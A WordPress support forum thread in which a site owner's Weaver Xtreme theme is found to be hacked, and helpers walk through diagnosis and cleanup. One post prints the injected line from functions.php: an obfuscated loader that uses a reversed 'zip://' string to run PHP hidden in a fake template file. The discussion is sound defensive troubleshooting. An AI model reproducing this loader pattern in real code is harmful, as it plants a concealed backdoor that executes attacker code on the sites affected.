Home Forums Weaver Xtreme Theme Undefined array key “HTTP_REFERER”

Viewing 16 posts - 1 through 16 (of 25 total)
  • Author
    Posts
  • #71849
    gunfacts
    Participant

    Getting a new warning at page top. Wanted to ping you before scanning the files.

    Warning: Undefined array key "HTTP_REFERER" in /homepages/37/d146050845/htdocs/gf-wp/wp-content/themes/weaver-xtreme/weaver-xtreme.template#template on line 43
    
    It seems to the latest post at http://www.gunfacts.info/blog/newsoms-gun-gaff/

    #71850
    gunfacts
    Participant

    Also, appears only when the URL is pasted into the browser (including an incognito). When I surf to other pages, then back to here via the menus, the warning does not appear.

    #71851
    scrambler
    Moderator

    @weaver would have to comment

    #71857
    hkp
    Participant

    @gunfacts

    The error message below shows on that page, irrespective of how it is accessed.

    As you say, WP only throws the visible warning notice when accessed, directly.

    And yes, page access via site search works fine, but however you access that page, it gives this error message as shown in F12> Console data.

    Error Message:

    ” addthis_widget.js:70:345986

    Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://api-public.addthis.com/url/serviceapi/shares-post.json?services=sFbt&url=https%3A%2F%2Fwww.gunfacts.info%2Fblog%2Fnewsoms-gun-gaff%2F. (Reason: CORS request did not succeed). Status code: (null). ”

    The error message also include this link for more info. on the issue:
    https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSDidNotSucceed

    Looks like a plugin issue, rather than a Theme issue.

    Regards.

    #71860
    gunfacts
    Participant

    Thanks.

    I’m unclear about “F12>Console Data”, but assuming Chrome inspector and the Console tab therein. In there, I am not seeing any reference addthis, just a note on jqmigrate being installed. Might I beg a screen grab of what you are seeing … I may need this to approach the addthis team.

    If I’m reading your reply correctly, the theory is that addthis is blockeds from some cross-site/origin and then likely returning a null, which Xtreme then chokes on?

    I find it odd that the error (regardless of source) only appears for direct access (can confirm it happens on random pages and posts, not just this one) and [b] that the error generates from weaver-xtreme/weaver-xtreme.template.

    #71861
    Weaver
    Keymaster

    There should NEVER be a file called /weaver-xtreme/weaver-xtreme.template. Never!

    Either your site has been hacked, or some plugin is doing something dangerous that it should not do. No plugin should ever add files to a theme’s directory.

    Try WordFence to scan your site. It should detect that file if there. (It is possible that a hack might create then delete such a file.)

    And the strange behavior described sounds exactly like what can happen to a hacked site.

    #71862
    hkp
    Participant

    @gunfacts

    Yes,  on Chrome Inspector or similar.

    Please see link for my screen capture: https://www.dropbox.com/s/q6zmgq5kmfp8sh2/guns-gaff.jpg?dl=0

    You can see the “addthis_widget.js:70:345986” on the right of the top red line marked “Undefined”.

    This error page will occur identically when the /newsoms-gun-gaff/ page is accessed.

    However, when it is accesses externally, e.g. pasting in the url, then a WP Warning is shown. But when the page comes from an internal search source, the WP Warning does now show.

    Hope this helps.

    Regards!

    #71863
    Weaver
    Keymaster

    @hkp – I think we cross posted. To me, this clearly seems to be a hacked site, or an ill-behaved plugin.

    The fact the error shows up differently depending on how the page is accessed is an indication of a hack.

    #71867
    hkp
    Participant

    @Weaver

    Yes!  As I was about to send, we lost power to our house, so had to fix that and  then re-write.  🙂

    Only after I posted it, did my screen refresh and I saw your reply…

    Always a learning experience!

    Regards and thanks!

     

     

    #71871
    gunfacts
    Participant

    Before I forget, thanks to everyone for jumping in. This was above my paygrade.

    Ugh! We have had hack attacks in the past (hactivist).

    Any recommendations on a safe, surgical way to weed this out given how it is reflected in a file that @weaver says should not exist?

    BTW, when I rename the suspect file, the site dies with the following:

    <b>Warning</b>: require_once(zip://#template): Failed to open stream: operation failed in <b>/homepages/37/d146050845/htdocs/gf-wp/wp-includes/template.php</b> on line <b>783</b>

    <b>Fatal error</b>: Uncaught Error: Failed opening required ‘zip://#template’ (include_path=’.:/usr/lib/php8.1′) in /homepages/37/d146050845/htdocs/gf-wp/wp-includes/template.php:783 Stack trace: #0 /homepages/37/d146050845/htdocs/gf-wp/wp-content/themes/weaver-xtreme/functions.php(731): load_template(‘zip://#template’, true) #1 /homepages/37/d146050845/htdocs/gf-wp/wp-settings.php(585): include(‘/homepages/37/d…’) #2 /homepages/37/d146050845/htdocs/gf-wp/wp-config.php(96): require_once(‘/homepages/37/d…’) #3 /homepages/37/d146050845/htdocs/gf-wp/wp-load.php(50): require_once(‘/homepages/37/d…’) #4 /homepages/37/d146050845/htdocs/gf-wp/wp-blog-header.php(13): require_once(‘/homepages/37/d…’) #5 /homepages/37/d146050845/htdocs/gf-wp/index.php(17): require(‘/homepages/37/d…’) #6 {main} thrown in <b>/homepages/37/d146050845/htdocs/gf-wp/wp-includes/template.php</b> on line <b>783</b>

    #71874
    gunfacts
    Participant

    ADDENDUM: When I chase down this stack into /weaver-xtreme/functions.php, I see this at the end (which to my eye looks abnormal):

     

    // THE END OF functions.php
    /* Weaver Xtreme Theme Template Loader */
    load_template( strrev( "//:piz" ) . locate_template( "weaver-xtreme.template" ) . "#template", true );

     

    When I look at the functions.php file in the current Xtreme download, those last two lines are not there.

    The weaver-xtreme.template file is a zip file. I unzip it and there is PHP code in it (can share if you are curious).

    I’ll await your advice, but I have a hunch I could comment-out that last line and things would be OK.

    ASIDE: I don’t know if someone is specifically hacking Xtreme sites, or if there code morphs to name-mimic whatever theme is in use.

    #71876
    Weaver
    Keymaster

    WordFence can cure most hacks like this. It scans for known valid WP, theme, and plugin files and restores them to the legit version.

    It will also delete injected files.

    The free version does that.

    I suspect there are not enough Xtreme sites around to be specifically hacked – there are just general hacks. The fact that this added lines to the end of functions.php which is file found in every theme.

    #71880
    gunfacts
    Participant

    Commenting out the appended load_template line doesn’t crash the system, but also doesn’t fix the warning message.

    #71881
    gunfacts
    Participant

    FYI: the ‘find’ command shows that this mysterious infection may be in all of my Xtreme-based web sites.

    What is the best way to upadate/refresh Xtreme in such a way that it erases all the suspect files?

     

    ./g3-music/wp-content/themes/weaver-xtreme/weaver-xtreme.template
    ./gf-wp/wp-content/themes/weaver-xtreme/weaver-xtreme.template
    ./ssm-wp/wp-content/themes/weaver-xtreme/weaver-xtreme.template
    #71882
    scrambler
    Moderator

    Save all your settings and download a copy for good measure

    • Switch to a different theme like one of the Wp 202x.
    • Deactivate AND Delete All weaver theme and plugins.
    • The reinstall Weaver Xtreme from WP and activate.
    • Next reinstall all the weaver plugins you were using (at a minimum the Xtreme them support plugin) from WP and activate.
    • If you bought the Xtreme Plus plugin, download a fresh copy from your weaver account, install and activate.
    • Then if you are not already using it, install the Wordfence security plugin.

    All your settings should be back

    #71883
    Weaver
    Keymaster

    Do you have some issue with Wordfence?

    You don’t have to keep using it, but if you had been using it, you may not have been hacked.

    But, to answer your last question, I’ll repeat. Use Wordfence! It will clear your site of infections and get your WP, plugins, and themes back to their initial state. It is the EASIEST way to do that.

    The other approach is to use your cPanel to delete non-WP files (do you know which ones those are? Wordfence does. Then, re-install WP and all plugins and themes. If the infection is outside of those files, then it might re-infect.

    We’ve not heard of any vulnerability in any Weaver theme or plugin. But there are other plugins that may be more hackable. And since your likely on a single server, if someone broke into one site, it is not overly surprising they got into every site on your host.

    But again, try Wordfence.

    Following the steps @scrambler listed are likely to work, but Wordfence will do all that  (except for premium plugins like Weaver Xtreme) automatically.

    There is a possibility your .htaccess file has been hacked, and that may need manual examination. And if your database has been hacked, that is a whole different question.

    AND, change you passwords!

Viewing 16 posts - 1 through 16 (of 25 total)
  • You must be logged in to reply to this topic.